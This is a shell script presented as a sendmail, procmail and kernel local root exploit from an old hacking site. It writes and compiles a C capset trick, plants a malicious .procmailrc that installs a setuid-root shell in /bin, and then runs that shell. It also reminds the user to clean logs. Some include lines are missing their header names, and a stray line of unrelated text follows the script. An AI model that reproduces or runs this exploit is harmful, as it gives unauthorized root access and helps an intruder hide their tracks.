#!/bin/sh echo "+-----------------------------------------------------+" echo "| Sendmail & procmail & kernel local root exploit |" echo "| |" echo "|Bugs found and exploit written by Wojciech Purczynski|" echo "| wp@elzabsoft.pl cliph/ircnet Vooyec/dalnet |" echo "+-----------------------------------------------------+" echo Creating cap.c cat <<_FOE_ > cap.c #define __KERNEL__ #include #undef __KERNEL__ #include _syscall2(int, capset, cap_user_header_t, header, const cap_user_data_t, data) extern int capset(cap_user_header_t header, cap_user_data_t data); int main() { struct __user_cap_header_struct caph={ _LINUX_CAPABILITY_VERSION, 0 }; struct __user_cap_data_struct capd={ 0, 0, 0xfffffe7f }; capset(&caph, &capd); system("echo|/usr/sbin/sendmail $USER"); } _FOE_ echo Creating $HOME/.procmailrc PROCMAILRCBAK=$HOME/.procmailrc.bak mv -f $HOME/.procmailrc $PROCMAILRCBAK cat <<_FOE_ > $HOME/.procmailrc :H * |/bin/tcsh -c "rm -fr /bin/sush; mv -f /tmp/sush /bin/sush; chown root.root /bin/sush; chmod 4111 /bin/sush" _FOE_ echo Compiling cap.c -> cap cc cap.c -o cap echo Creating sush.c cat <<_FOE_ > sush.c #include int main() { setuid(0); setgid(0); execl("/bin/bash", "bash", NULL); } _FOE_ echo Compiling sush cc sush.c -o /tmp/sush echo Executing cap ./cap echo Don\'t forget to clean logs echo Waiting for suid shell while [ ! -f /bin/sush ]; do sleep 1 done echo Cleaning everything rm -fr $HOME/.procmailrc cap.c cap sush.c mv $PROCMAILRCBAK $HOME/.procmailrc echo Executing suid shell /bin/sush # www.hack.co.za [12 June]#

亚洲欧美在线